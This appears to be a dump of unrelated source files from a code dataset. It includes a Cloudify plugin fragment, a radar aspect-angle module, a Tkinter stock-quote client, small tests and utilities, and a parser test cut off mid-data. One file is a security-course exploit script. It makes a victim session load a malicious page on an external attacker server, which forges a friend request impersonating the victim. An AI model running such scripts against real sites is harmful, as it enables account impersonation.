raise exceptions.NonRecoverableError(
"Deployment ID as runtime property not specified.")
client = manager.get_rest_client()
deployment_id = ctx.instance.runtime_properties[
'deployment_id']
proxy_common.poll_until_with_timeout(
proxy_common.check_if_deployment_is_ready(
client, deployment_id),
expected_result=True,
timeout=900)
if not ctx.node.properties['use_existing_deployment']:
proxy_common.execute_workflow(deployment_id,
'install')
ctx.instance.runtime_properties[
'outputs'] = (client.deployments.get(
deployment_id).outputs)
ctx.logger.info("Exiting install_deployment event.")
@operation
def uninstall_deployment(**kwargs):
ctx.logger.info("Entering uninstall_deployment event.")
if 'deployment_id' not in ctx.instance.runtime_properties:
raise exceptions.NonRecoverableError(
"Deployment ID as runtime property not specified.")
deployment_id = ctx.instance.runtime_properties[
'deployment_id']
if not ctx.node.properties['use_existing_deployment']:
proxy_common.execute_workflow(deployment_id,
'uninstall')
ctx.logger.info("Exiting uninstall_deployment event.")
@operation
def get_outputs(**kwargs):
# if (ctx.target.node._node.type!='cloudify.nodes.DeploymentProxy'):
# raise (NonRecoverableError('invalid target: must connect to DeploymentProxy type'))
for output in ctx.target.node.properties['inherit_outputs']:
ctx.source.instance.runtime_properties[output]=ctx.target.instance.runtime_properties[output]
| StarcoderdataPython |
54860 | <reponame>Opty-MISCE/SS
from requests import session, get
from random import randint
from sys import argv
from Common.Driver import runScript
SERVER = argv[1]
attackerSERVER = "http://web.tecnico.ulisboa.pt/ist190774/SSof/R2Ai2t0bslrVyMxUOUyO.html"
victimSession = session()
victimUsername = str(randint(2 ** 27, 2 ** 28))
victimPassword = str(randint(2 ** 27, 2 ** 28))
attackerSession = session()
attackerUsername = "Attacker"
attackerPassword = str(randint(2 ** 27, 2 ** 28))
# Cleaning DB
r = get(SERVER + "/init")
assert "Initialisation DONE!" in r.text
data = {
"username": attackerUsername,
"password": <PASSWORD>
}
r = attackerSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert attackerUsername in r.text
data = {
"username": victimUsername,
"password": <PASSWORD>
}
r = victimSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert victimUsername in r.text
# The Victim Browser Executes the Malicious Script
# And Make a Friend Request to the Attacker Impersonating the Victim
runScript(SERVER, attackerSERVER, victimSession)
r = attackerSession.get(SERVER + "/pending_requests")
assert victimUsername in r.text
print("Success!")
victimSession.close()
attackerSession.close()
| StarcoderdataPython |
171749 | #
# radarbeam.py
#
# module for calculating geometry parameters and magnetic aspect
# angle of radar targets monitored by any radar
#
# use aspect_elaz or aspect_txty to calculate aspect angles of targets
# specified by (el,az) or (tx,ty) angles
#
# Created by <NAME> on 11/29/08 as jrobeam.py
# Copyright (c) 2008 ECE, UIUC. All rights reserved.
# history
# - Aug29,2013 by <NAME>
# -Generate a module that accepts the lon,lat,h coordinates for the location
# of any radar.
# -flattening has been changed from 1/298.257 to 1./298.257223563
# using the WGS84 reference in:
# http://earth-info.nga.mil/GandG/publications/tr8350.2/wgs84fin.pdf
# - A new routine called enu2xyz to move a point from xr,yr,zr to some
# direction east, north, up
def llh2xyz(latg,lon,h):
# returns geocentric xyz coordinates (ECEF) in km of a target with
# latitude latg (rad) --- geodetic
# longitude lon (rad)
# height h (km above local ellipsoid)
n=a_WGS / np.sqrt(1.-flatness*(2.-flatness) * np.sin(latg)**2.)
# cartesian geocentric coordinates wrt Greenwich
x=(n+h)*np.cos(latg)*np.cos(lon)
y=(n+h)*np.cos(latg)*np.sin(lon)
z=(n*(1.-eccentricity**2.)+h)*np.sin(latg)
return x,y,z
def xyz2llh(x,y,z):
# returns longitude 'lon', geodetic latitude 'lat', and height 'h'
# of position (x,y,z) defined in geocentric coordinate system (ECEF)
# on Oct23,2013 by <NAME>, adding the .all() in order to support
# arrays
p=np.sqrt(x**2.+y**2.)
lon=np.arctan2(y,x)
lat=np.arctan2(z,p)
latp=lat.copy()
for i in range(10):
n=a_WGS/np.sqrt(1.-flatness*(2-flatness)*np.sin(latp)**2.)
h=p/np.cos(latp)-n
lat=np.arctan(z/(p*(1.-n*eccentricity**2./(n+h))))
if (abs(lat-latp)<3.*eps).all():
n=a_WGS/np.sqrt(1.-flatness*(2.-flatness)*np.sin(lat)**2.)
h=p/np.cos(lat)-n
break
latp=lat.copy()
return lat,lon,h
def enu2xyz(xr,yr,zr,east,north,up):
# moves a point from xr,yr,zr to x,y,z by moving into the direction
# specified by east,north,up (enu) coordinates in km
latg,lon,h = xyz2llh(xr,yr,zr)
A = np.array([[-np.sin(lon),-np.sin(latg)*np.cos(lon),np.cos(latg)*np.cos(lon)],
[ np.cos(lon),-np.sin(latg)*np.sin(lon),np.cos(latg)*np.sin(lon)],
[ 0 , np.cos(latg) ,np.sin(latg)]])
x,y,z = np.dot(A,np.array([east,north,up]))+np.array([xr,yr,zr])
return x,y,z
def cosBs(year,rr,el,az):
# decomposes the radial unit vector to the target to direction cosines of magnetic North, East, and Up
tx=cos(el)*sin(az) # direction cosines wrt east and north
ty=cos(el)*cos(az)
tz=sin(el)
xyz=xyz0+rr*(tx*east0+ty*north0+tz*zenith0) # target vector
r=sqrt(dot(xyz,xyz))
lat,lon,h=xyz2llh(xyz[0],xyz[1],xyz[2]) # target lat, lon, height
radial=xyz/r; # unit vector to target
p=sqrt(xyz[0]**2+xyz[1]**2)
east=array([-xyz[1],xyz[0],0])/p # unit vector to east from target
north=-cross(east,radial) # unit vector to north from target
rr_=xyz-xyz0 # vector from radar to target
rr_u=rr_/sqrt(dot(rr_,rr_)) # unit vector from radar to target
[bX,bY,bZ,bB]=igrf.igrf_B(year,r-a_igrf,lon/deg,lat/deg)
bfield=array([bX,bY,bZ])
B=bX*north+bY*east-bZ*radial # magnetic field vector B
bn=B/sqrt(dot(B,B)) # "magnetic north" unit vector since B points by definition in "magnetic north" direction
be=cross(bn,radial)
be=be/sqrt(dot(be,be)) # magnetic east unit vector
bu=cross(be,bn) # magnetic up unit vector
cosBn=dot(bn,rr_u) # magnetic north direction-cosine of rr_u
aspect_angle=arccos(cosBn)
cosBe=dot(be,rr_u) # magnetic east direction-cosine of rr_u
cosBu=dot(bu,rr_u) # magnetic up direction-cosine of rr_u
"""
uLOS=cosBe*U(h)+cosBn*V(h)+cosBu*W(h) ... LOS wind model in terms of wind components to calculate and direction cosines
"""
return r,lat,lon,h,xyz,B,aspect,cosBn,cosBe,cosBu
# --------------------------------------------------------------
import numpy as np
from pyigrf import igrf
eps=np.finfo(float).eps # float resolution
deg=np.pi/180. # to express angles in degree values
a_igrf=6371.2 # mean earth radius (km)
# WGS84 constants
# reference:
# http://earth-info.nga.mil/GandG/publications/tr8350.2/wgs84fin.pdf
a_WGS=6378.137 # equatorial radius WGS 84 (semi-major axis) in km
#flatness=1/298.257
flatness = 1./298.257223563 # flatenning
b_WGS=a_WGS*(1.-flatness) # WGS polar radius (semi-minor axis) in km
eccentricity=np.sqrt(a_WGS**2-b_WGS**2)/a_WGS
# ------------ radar specifications -------------------------
class radarspecs:
"""Will contain radar coordinates and coordinate conversions
saved locations:
JRO : lat: -11.947917 , lon: -76.872306, h0: 0.463 km
JRO_GE : as zoom in with GoogleEarth to the center of the antenna.
IRIS@ROI
ALTAIR
IRIS@URBANA
"""
def __init__(self,lat0=None,lon0=None,h0=None,location=None):
if location!=None:
if location.upper() == "JRO":
# geodetic, the usual map or GPS latitude
self.lat0 = -11.947917 * deg
self.lon0 = -76.872306 * deg
self.h0 = 0.463 # local height in km above reference ellipsoid
elif location.upper() == "JRO_GE":
# gusing google earth to the center of the Antenna
# -11.9514944444 = -(11.+57./60.+5.38/3600.) # 11deg57'5.38"S
self.lat0 = -11.9514944444 * deg
# -76.8743916667#-(76.+52./60.+27.81/3600.) # 76deg52'27.81"W
self.lon0 = -76.8743916667 * deg
self.h0 = 0.463 # local height in km above reference ellipsoid
elif location.upper() == "IRIS@ROI":
# 9.39794444444 = (9.+23./60.+52.6/3600.) # 9deg23'52.60"N
self.lat0 = 9.39794444444 * deg
# 167.469166667 = (167.+28./60.+9./3600.) # 167deg28'9.00"E
self.lon0 = 167.469166667 * deg
self.h0 = 0.012
elif location.upper() == "ALTAIR":
# 9.39794444444 = (9.+23./60.+43.5/3600.) # 9deg23'43.50"N
self.lat0 = 9.39541666667 * deg
# 167.469166667 = (167.+28./60.+45.6/3600.) # 167deg28'45.60"E
self.lon0 = 167.479333333 * deg
self.h0 = 0.012
elif location.upper() == "IRIS@URBANA":
# 40.16683888888889 = (40.+10./60.+0.62/3600.) #40deg10'0.62"N
self.lat0 = 40.16683888888889 * deg
#-88.1586 = -(88.+9./60.+30.96/3600.) #88deg9'30.96"W
self.lon0 = (360. -88.1586) * deg
self.h0 = 0.221
elif lat0==None or lon0==None or h0==None:
# By default: JRO center of antenna with google earth
# -11.9514944444 = -(11.+57./60.+5.38/3600.) # 11deg57'5.38"S
self.lat0 = -11.9514944444 * deg
# -76.8743916667#-(76.+52./60.+27.81/3600.) # 76deg52'27.81"W
self.lon0 = -76.8743916667 * deg
self.h0 = 0.463 # local height in km above reference ellipsoid
else:
self.lat0 = lat0 * deg
self.lon0 = lon0* deg
self.h0 = h0 # local height in km above reference ellipsoid
x0,y0,z0 = llh2xyz(self.lat0,self.lon0,self.h0)
self.xyz0 = np.array([x0,y0,z0])
xy0 = np.array([x0,y0])
p0 = np.sqrt(np.dot(xy0,xy0))
# unit vectors from jro
self.east0 = np.array([-y0,x0,0])/p0
# zenith and north directions wrt local ellipsoid
self.zenith0 = np.array([np.cos(self.lat0) * np.cos(self.lon0),
np.cos(self.lat0) * np.sin(self.lon0),
np.sin(self.lat0)])
self.north0 = np.cross(self.zenith0,self.east0)
# orthonormal basis vectors including the jro on-axis direction
dec=-12.88*deg
ha=-(4.+37./60.)*deg # on-axis direction at JRO
self.uo = np.array([np.cos(dec) * np.cos(ha/4. + self.lon0), # on axis
np.cos(dec) * np.sin(ha/4. + self.lon0), np.sin(dec)])
self.ux = np.cross(self.zenith0,self.uo)
# along the building to the right
self.ux = self.ux / np.sqrt(np.dot(self.ux,self.ux))
# away from the building into the valley
self.uy = np.cross(self.uo,self.ux)
def locations(self):
return ["JRO","JRO_GE","IRIS@ROI","ALTAIR","IR<EMAIL>"]
def dec_ha2el_az(dec,ha):
# returns elevation and azimuth angles of a radar beam
# with respect to local tangent plane.
# the beam is specified by:
# declination dec (deg)
# hour angle ha (min)
# with respect to radar location at longitude lon0 and height h0
# above reference ellipsiod at geodetic latitude lat0
lat=dec*deg # on celestial sphere
lon=2.*pi*(ha/(24.*60.))
lon=lon+lon0 # on celestial sphere
vec=array([cos(lat)*cos(lon),cos(lat)*sin(lon),sin(lat)])
hor=vec-dot(vec,zenith0)*zenith0
hor=hor/sqrt(dot(hor,hor))
el=arccos(dot(hor,vec))/deg
north=dot(hor,north0)
east=dot(hor,east0)
az=arctan2(east,north)/deg
return el,az
def xyz2dec_ha(self,vec):
# declination and hour angle in target direction used to describe radar
# beam direction at JRO, corresponding to latitude and relative
# longitude of the beam-spot on the celestial sphere, corresponds to
# rr->\infty, in which case:
vec = vec/np.sqrt(np.dot(vec,vec))
p = np.sqrt(vec[0]**2.+vec[1]**2.)
dec = np.arctan2(vec[2],p)/deg # in degrees
ha = (np.arctan2(vec[1],vec[0]) - self.lon0)*(24./(2.*np.pi))*60. # in minutes
return dec,ha
def aspect_angle(self,year,xyz):
# returns the magnetic aspect angle (rad) of a target with
# geocentric vector xyz defined in geocentric coordinates
r = np.sqrt(np.dot(xyz,xyz))
p = np.sqrt(xyz[0]**2. + xyz[1]**2.)
lat = np.arctan2(xyz[2],p)
lon = np.arctan2(xyz[1],xyz[0])
radial = xyz/r; # directions from target
east = np.array([-xyz[1],xyz[0],0.])/p
north = -np.cross(east,radial)
rr = xyz - self.xyz0
u_rr = rr / np.sqrt(np.dot(rr,rr)) # unit vector from radar to target
[bX,bY,bZ,bB] = igrf.igrf_B(year, r - a_igrf, lon/deg, lat/deg)
bfield = np.array([bX,bY,bZ])
B = bX*north + bY*east - bZ*radial
u_B = B / np.sqrt(np.dot(B,B))
aspect = np.arccos(np.dot(u_B, u_rr))
return r,lat,lon,aspect
def aspect_txty(self,year,rr,tx,ty):
# returns magnetic aspect angle and geocentric coordinates of a target
# tracked by jro at
# range rr (km)
# tx along jro building
# ty into the building
tz = np.sqrt(1.-tx**2.-ty**2.)
#geocentric coordinates of target
xyz = self.xyz0 + rr*(tx*self.ux + ty*self.uy + tz*self.uo)
[r,lat,lon,aspect] = self.aspect_angle(year,xyz)
[dec,ha] = self.xyz2dec_ha(xyz - self.xyz0)
return r,lon,lat,dec,ha,aspect
def aspect_elaz(self,year,rr,el,az):
# returns magnetic aspect angle and geocentric coordinates of a target
# tracked by jro at
# range rr (km)
# elevation el (rad above local tangent plane to ellipsoid)
# azimuth az (rad east of local north)
tx = np.cos(el) * np.sin(az) # direction cosines wrt east and north
ty = np.cos(el) * np.cos(az)
tz = np.sin(el)
#geocentric coordinates of target :
xyz = self.xyz0 + rr*(tx * self.east0 + ty*self.north0+tz*self.zenith0)
[r,lat,lon,aspect] = self.aspect_angle(year,xyz)
[dec,ha] = xyz2dec_ha(xyz - self.xyz0)
return r,lon,lat,dec,ha,aspect
| StarcoderdataPython |
4833178 | import random
#while True:
num1 = random.randint(1,100)
num2 = random.randint(1,100)
result = int(input(f'{num1}-{num2}='))
if result == (num1-num2) :
print("정답입니다.")
else :
print("틀렸습니다.") | StarcoderdataPython |
3300288 | # 先把API com元件初始化
import os
# 第一種讓群益API元件可導入讓Python code使用的方法
#import win32com.client
#from ctypes import WinDLL,byref
#from ctypes.wintypes import MSG
#SKCenterLib = win32com.client.Dispatch("{AC30BAB5-194A-4515-A8D3-6260749F8577}")
#SKQuoteLib = win32com.client.Dispatch("{E7BCB8BB-E1F0-4F6F-A944-2679195E5807}")
# 第二種讓群益API元件可導入Python code內用的物件宣告
import comtypes.client
#comtypes.client.GetModule(os.path.split(os.path.realpath(__file__))[0] + r'\SKCOM.dll')
import comtypes.gen.SKCOMLib as sk
skC = comtypes.client.CreateObject(sk.SKCenterLib,interface=sk.ISKCenterLib)
skOOQ = comtypes.client.CreateObject(sk.SKOOQuoteLib,interface=sk.ISKOOQuoteLib)
skO = comtypes.client.CreateObject(sk.SKOrderLib,interface=sk.ISKOrderLib)
skOSQ = comtypes.client.CreateObject(sk.SKOSQuoteLib,interface=sk.ISKOSQuoteLib)
skQ = comtypes.client.CreateObject(sk.SKQuoteLib,interface=sk.ISKQuoteLib)
skR = comtypes.client.CreateObject(sk.SKReplyLib,interface=sk.ISKReplyLib)
# 畫視窗用物件
from tkinter import *
from tkinter.ttk import *
from tkinter import messagebox,colorchooser,font,Button,Frame,Label
# 數學計算用物件
import math
# 顯示各功能狀態用的function
def WriteMessage(strMsg,listInformation):
listInformation.insert('end', strMsg)
listInformation.see('end')
def SendReturnMessage(strType, nCode, strMessage,listInformation):
GetMessage(strType, nCode, strMessage,listInformation)
def GetMessage(strType,nCode,strMessage,listInformation):
strInfo = ""
if (nCode != 0):
strInfo ="【"+ skC.SKCenterLib_GetLastLogInfo()+ "】"
WriteMessage("【" + strType + "】【" + strMessage + "】【" + skC.SKCenterLib_GetReturnCodeMessage(nCode) + "】" + strInfo,listInformation)
#----------------------------------------------------------------------------------------------------------------------------------------------------
#上半部登入框
class FrameLogin(Frame):
def __init__(self, master = None):
Frame.__init__(self, master)
self.grid()
#self.pack()
self.place()
self.FrameLogin = Frame(self)
self.master["background"] = "#ffecec"
self.FrameLogin.master["background"] = "#ffecec"
self.createWidgets()
def createWidgets(self):
#帳號
self.labelID = Label(self)
self.labelID["text"] = "帳號:"
self.labelID["background"] = "#ffecec"
self.labelID["font"] = 20
self.labelID.grid(column=0,row=0)
#輸入框
self.textID = Entry(self)
self.textID["width"] = 50
self.textID.grid(column = 1, row = 0)
#密碼
self.labelPassword = Label(self)
self.labelPassword["text"] = "密碼:"
self.labelPassword["background"] = "#ffecec"
self.labelPassword["font"] = 20
self.labelPassword.grid(column = 2, row = 0)
#輸入框
self.textPassword = Entry(self)
self.textPassword["width"] = 50
self.textPassword['show'] = '*'
self.textPassword.grid(column = 3, row = 0)
#按鈕
self.buttonLogin = Button(self)
self.buttonLogin["text"] = "登入"
self.buttonLogin["background"] = "#ff9797"
self.buttonLogin["foreground"] = "#000000"
self.buttonLogin["highlightbackground"] = "#ff0000"
self.buttonLogin["font"] = 20
self.buttonLogin["command"] = self.buttonLogin_Click
self.buttonLogin.grid(column = 4, row = 0)
#ID
self.labelID = Label(self)
self.labelID["text"] = "<<ID>>"
self.labelID["background"] = "#ffecec"
self.labelID["font"] = 20
self.labelID.grid(column = 5, row = 0)
#訊息欄
self.listInformation = Listbox(root, height=5)
self.listInformation.grid(column = 0, row = 1, sticky = E + W)
global GlobalListInformation,Global_ID
GlobalListInformation = self.listInformation
Global_ID = self.labelID
# 這裡是登入按鈕,使用群益API不管要幹嘛你都要先登入才行
def buttonLogin_Click(self):
try:
skC.SKCenterLib_SetLogPath(os.path.split(os.path.realpath(__file__))[0] + "\\CapitalLog_Quote")
m_nCode = skC.SKCenterLib_Login(self.textID.get().replace(' ',''),self.textPassword.get().replace(' ',''))
if(m_nCode==0):
Global_ID["text"] = self.textID.get().replace(' ','')
WriteMessage("登入成功",self.listInformation)
else:
WriteMessage(m_nCode,self.listInformation)
except Exception as e:
messagebox.showerror("error!",e)
# 報價連線的按鈕
class FrameQuote(Frame):
def __init__(self, master = None):
Frame.__init__(self, master)
self.grid()
self.FrameQuote = Frame(self)
self.FrameQuote.master["background"] = "#ffecec"
self.createWidgets()
def createWidgets(self):
#ID
# self.labelID = Label(self)
# self.labelID["text"] = "ID:"
# self.labelID.grid(column = 0, row = 0)
#Connect
self.btnConnect = Button(self)
self.btnConnect["text"] = "報價連線"
self.btnConnect["background"] = "#ff9797"
self.btnConnect["font"] = 20
self.btnConnect["command"] = self.btnConnect_Click
self.btnConnect.grid(column = 0, row = 1)
#Disconnect
self.btnDisconnect = Button(self)
self.btnDisconnect["text"] = "報價斷線"
self.btnDisconnect["background"] = "#ff9797"
self.btnDisconnect["font"] = 20
self.btnDisconnect["command"] = self.btnDisconnect_Click
self.btnDisconnect.grid(column = 1, row = 1)
# #ConnectSignal
# self.ConnectSignal = Label(self)
# self.ConnectSignal["text"] = "【FALSE】"
# self.ConnectSignal.grid(column = 2, row = 1)
#TabControl
self.TabControl = Notebook(self)
self.TabControl.add(Quote(master = self),text="報價細節")
self.TabControl.add(KLine(master = self),text="KLine")
self.TabControl.grid(column = 0, row = 2, sticky = E + W, columnspan = 4)
def btnConnect_Click(self):
try:
m_nCode = skQ.SKQuoteLib_EnterMonitor()
SendReturnMessage("Quote", m_nCode, "SKQuoteLib_EnterMonitor",GlobalListInformation)
except Exception as e:
messagebox.showerror("error!",e)
def btnDisconnect_Click(self):
try:
m_nCode = skQ.SKQuoteLib_LeaveMonitor()
if (m_nCode != 0):
strMsg = "SKQuoteLib_LeaveMonitor failed!", skC.SKCenterLib_GetReturnCodeMessage(m_nCode)
WriteMessage(strMsg,GlobalListInformation)
else:
SendReturnMessage("Quote", m_nCode, "SKQuoteLib_LeaveMonitor",GlobalListInformation)
except Exception as e:
messagebox.showerror("error!",e)
#下半部-報價-Quote項目
class Quote(Frame):
def __init__(self, master = None):
Frame.__init__(self, master)
self.grid()
self.Quote = Frame(self)
self.Quote.master["background"] = "#ffecec"
self.createWidgets()
def createWidgets(self):
#PageNo
self.LabelPageNo = Label(self)
self.LabelPageNo["text"] = "PageNo"
self.LabelPageNo["background"] = "#ffecec"
self.LabelPageNo["font"] = 20
self.LabelPageNo.grid(column=0,row=0)
#輸入框
self.txtPageNo = Entry(self)
self.txtPageNo.grid(column=1,row=0)
#商品代碼
self.LabelStocks = Label(self)
self.LabelStocks["text"] = "商品代碼"
self.LabelStocks["background"] = "#ffecec"
self.LabelStocks["font"] = 20
self.LabelStocks.grid(column=2,row=0)
#輸入框
self.txtStocks = Entry(self)
self.txtStocks.grid(column=3,row=0)
#提示
self.LabelP = Label(self)
self.LabelP["text"] = "( 多筆以逗號{,}區隔 )"
self.LabelP["background"] = "#ffecec"
self.LabelP["font"] = 20
self.LabelP.grid(column=2,row=1, columnspan=2)
#按鈕
self.btnQueryStocks = Button(self)
self.btnQueryStocks["text"] = "查詢"
self.btnQueryStocks["background"] = "#ff9797"
self.btnQueryStocks["foreground"] = "#000000"
self.btnQueryStocks["font"] = 20
self.btnQueryStocks["command"] = self.btnQueryStocks_Click
self.btnQueryStocks.grid(column = 4, row = 0)
#訊息欄
self.listInformation = Listbox(self, height = 25, width = 100)
self.listInformation.grid(column = 0, row = 2, sticky = E + W, columnspan = 6)
global Gobal_Quote_ListInformation
Gobal_Quote_ListInformation = self.listInformation
def btnQueryStocks_Click(self):
try:
if(self.txtPageNo.get().replace(' ','') == ''):
pn = 0
else:
pn = int(self.txtPageNo.get())
skQ.SKQuoteLib_RequestStocks(pn,self.txtStocks.get().replace(' ',''))
except Exception as e:
messagebox.showerror("error!",e)
#下半部-報價-KLine項目
class KLine(Frame):
def __init__(self, master = None):
Frame.__init__(self, master)
self.grid()
self.KLine = Frame(self)
self.KLine.master["background"] = "#ffecec"
self.createWidgets()
def createWidgets(self):
#商品代碼
self.LabelKLine = Label(self)
self.LabelKLine["text"] = "商品代碼"
self.LabelKLine["background"] = "#ffecec"
self.LabelKLine["font"] = 20
self.LabelKLine.grid(column=0,row=0)
#輸入框
self.txtKLine = Entry(self)
self.txtKLine.grid(column=1,row=0)
#提示
# self.LabelP = Label(self)
# self.LabelP["text"] = "( 多筆以逗號{,}區隔 )"
# self.LabelP.grid(column=0,row=1, columnspan=2)
#K線種類
self.boxKLine = Combobox(self,state='readonly')
self.boxKLine['values'] = ("0 = 1分鐘線", "4 =完整日線", "5 =週線", "6 =月線")
self.boxKLine.grid(column=2,row=0)
#K線輸出格式
self.boxOutType = Combobox(self,state='readonly')
self.boxOutType['values'] = ("0=舊版輸出格式", "1=新版輸出格式")
self.boxOutType.grid(column=3,row=0)
#按鈕
self.btnKLine = Button(self)
self.btnKLine["text"] = "查詢"
self.btnKLine["background"] = "#ff9797"
self.btnKLine["foreground"] = "#000000"
self.btnKLine["font"] = 20
self.btnKLine["command"] = self.btnKLine_Click
self.btnKLine.grid(column = 4, row = 0)
# #按鈕
# self.btnCalcute = Button(self)
# self.btnCalcute["text"] = "計算"
# self.btnCalcute["background"] = "#66b3ff"
# self.btnCalcute["foreground"] = "white"
# self.btnCalcute["font"] = 20
# self.btnCalcute["command"] = self.btnCalcute_Click
# self.btnCalcute.grid(column = 5, row = 0)
#訊息欄
self.listInformation = Listbox(self, height = 25, width = 100)
self.listInformation.grid(column = 0, row = 2, sticky = E + W, columnspan = 6)
#雖然上面有設定global了,但是這邊還是要再宣告一次,不然不會過
global Gobal_KLine_ListInformation
Gobal_KLine_ListInformation = self.listInformation
def btnKLine_Click(self):
try:
# skQ.SKQuoteLib_RequestKLine(self.txtKLine.get(),self.boxKLine.get(),self.boxOutType.get())
if(self.boxKLine.get() == "0 = 1分鐘線"):
ktp=0
elif(self.boxKLine.get() == "4 =完整日線"):
ktp=4
elif(self.boxKLine.get() == "5 =週線"):
ktp=5
else:
ktp=6
if(self.boxOutType.get() == "0=舊版輸出格式"):
otp=0
else:
otp=1
m_nCode = skQ.SKQuoteLib_RequestKLine(self.txtKLine.get().replace(' ','') , ktp , otp)
SendReturnMessage("Quote", m_nCode, "SKQuoteLib_RequestKLine",GlobalListInformation)
except Exception as e:
messagebox.showerror("error!",e)
#事件
class SKQuoteLibEvents:
def OnConnection(self, nKind, nCode):
if (nKind == 3001):
strMsg = "Connected!"
elif (nKind == 3002):
strMsg = "DisConnected!"
elif (nKind == 3003):
strMsg = "Stocks ready!"
elif (nKind == 3021):
strMsg = "Connect Error!"
WriteMessage(strMsg,GlobalListInformation)
def OnNotifyQuote(self, sMarketNo, sStockidx):
pStock = sk.SKSTOCK()
skQ.SKQuoteLib_GetStockByIndex(sMarketNo, sStockidx, pStock)
strMsg = '代碼:',pStock.bstrStockNo,'--名稱:',pStock.bstrStockName,'--開盤價:',pStock.nOpen/math.pow(10,pStock.sDecimal),'--最高:',pStock.nHigh/math.pow(10,pStock.sDecimal),'--最低:',pStock.nLow/math.pow(10,pStock.sDecimal),'--成交價:',pStock.nClose/math.pow(10,pStock.sDecimal),'--總量:',pStock.nTQty
WriteMessage(strMsg,Gobal_Quote_ListInformation)
def OnNotifyKLineData(self,bstrStockNo,bstrData):
cutData = bstrData.split(',')
strMsg = bstrStockNo,bstrData
WriteMessage(strMsg,Gobal_KLine_ListInformation)
#SKQuoteLibEventHandler = win32com.client.WithEvents(SKQuoteLib, SKQuoteLibEvents)
SKQuoteEvent=SKQuoteLibEvents()
SKQuoteLibEventHandler = comtypes.client.GetEvents(skQ, SKQuoteEvent)
if __name__ == '__main__':
root = Tk()
FrameLogin(master = root)
#TabControl
root.TabControl = Notebook(root)
root.TabControl.add(FrameQuote(master = root),text="報價功能")
root.TabControl.grid(column = 0, row = 2, sticky = E + W)
root.mainloop()
| StarcoderdataPython |
3264336 | <gh_stars>0
import unittest
import Calculadora_Melu
class TestCalculadora (unittest.TestCase):
def testMultiplicacion(self):
resultado=Calculadora_Melu.multiplicacion (2, 4)
self.assertEqual(resultado, 8)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
1797724 | """This module contains the base class for a Chunker.
Classes:
Chunker: The duty of a chunker is to get the global inventory and split it
in smaller chunks
"""
from abc import abstractmethod
from suzieq.poller.controller.base_controller_plugin import ControllerPlugin
class Chunker(ControllerPlugin):
"""Abstract class for a Chunker
"""
@abstractmethod
def chunk(self, glob_inv, n_chunks, **addl_params):
"""Split the global inventory in <n_chunks> chunks
Args:
glob_inv ([type]): global inventory to split
n_chunks ([type]): number of chunks
addl_parameters ([type]): custom parameters that each Chunker
plugin can define
"""
| StarcoderdataPython |
116756 | <reponame>wilkeraziz/chisel<gh_stars>1-10
__author__ = 'waziz'
from itertools import izip
import numpy as np
def scaled_fmap(fmap, scaling=1.0):
"""Returns a feature map scaled by a constant"""
if type(fmap) is dict:
return {k: v*scaling for k, v in fmap.iteritems()}
else:
return {k: v*scaling for k, v in fmap}
def fmap_dot(fmap, wmap):
return np.sum([fmap.get(fname, 0) * fweight for fname, fweight in wmap.iteritems()])
#return sum(fmap.get(fname, 0) * fweight for fname, fweight in wmap.iteritems())
def str2fmap(line):
"""converts a string of the type 'f1=v1 f2=v2' into a feature map {f1: v1, f2: v2}"""
return {k: float(v) for k, v in (pair.split('=') for pair in line.split())}
def fpairs2str(iterable):
"""converts an iterable of feature-value pairs into string"""
return ' '.join('%s=%s' % (k, str(v)) for k, v in iterable)
def dict2str(d, separator='=', sort=False, reverse=False):
"""converts an iterable of feature-value pairs into string"""
if sort:
return ' '.join('{0}{1}{2}'.format(k, separator, v) for k, v in sorted(d.iteritems(), reverse=reverse))
else:
return ' '.join('{0}{1}{2}'.format(k, separator, v) for k, v in d.iteritems())
def npvec2str(nparray, fnames=None):
"""converts an array of feature values into a string (fnames can be provided)"""
if fnames is None:
return ' '.join(str(fvalue) for fvalue in nparray)
else:
return ' '.join('{0}={1}'.format(fname, fvalue) for fname, fvalue in izip(fnames, nparray))
def kv2str(key, value, named=True):
return '{0}={1}'.format(key, value) if named else str(value)
def resample(p, size):
"""Resample elements according to a distribution p and returns an empirical distribution"""
support = p.size
hist, edges = np.histogram(np.random.choice(np.arange(support), size, p=p), bins=np.arange(support + 1), density=True)
return hist
def obj2id(element, vocab):
v = vocab.get(element, None)
if v is None:
v = len(vocab)
vocab[element] = v
return v
| StarcoderdataPython |
30909 | #!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_nutnrb
@file marine-integrations/mi/dataset/parser/test/test_nutnrb.py
@author <NAME>
@brief Test code for a Nutnrb data parser
"""
import unittest
import gevent
from StringIO import StringIO
from nose.plugins.attrib import attr
from mi.core.log import get_logger ; log = get_logger()
from mi.core.exceptions import SampleException
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_driver import DataSetDriverConfigKeys
from mi.dataset.parser.nutnrb import NutnrbParser, NutnrbDataParticle, StateKey
# Add a mixin here if needed
@unittest.skip('Nutnr parser is broken, timestamp needs to be fixed')
@attr('UNIT', group='mi')
class NutnrbParserUnitTestCase(ParserUnitTestCase):
"""
WFP Parser unit test suite
"""
TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
